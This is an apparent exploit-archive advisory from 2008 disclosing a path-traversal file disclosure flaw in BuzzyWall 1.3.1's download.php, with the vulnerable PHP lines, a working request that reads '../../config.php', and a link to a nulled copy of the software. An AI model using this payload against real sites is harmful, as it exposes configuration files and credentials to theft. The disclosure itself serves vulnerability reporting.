BuzzyWall version 1.3.1 suffers from a remote file disclosure vulnerability in download.php.
717d72e20abc0c2bea88c2dd1e27c73ce7050a0221095c445fb93147fefd0231 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ BuzzyWall Remote File Disclosure Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
AUTHOR : b3hz4d
DATE : 25 oct 2008
SITE : WwW.DeltaHacking.Net
#####################################################
APPLICATION : BuzzyWall
DOWNLOAD : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
VENDOR : http://www.buzzywall.com
#####################################################
[+] vuln : ./download.php
$file_name = $_GET['id']
$file_path = $weburl."wallpapers/full/".$file_name;
.
.
.
.
readfile("$file_path");
[+] Exploit : http://victim.com/download.php?id=../../config.php
##############################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #
##############################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed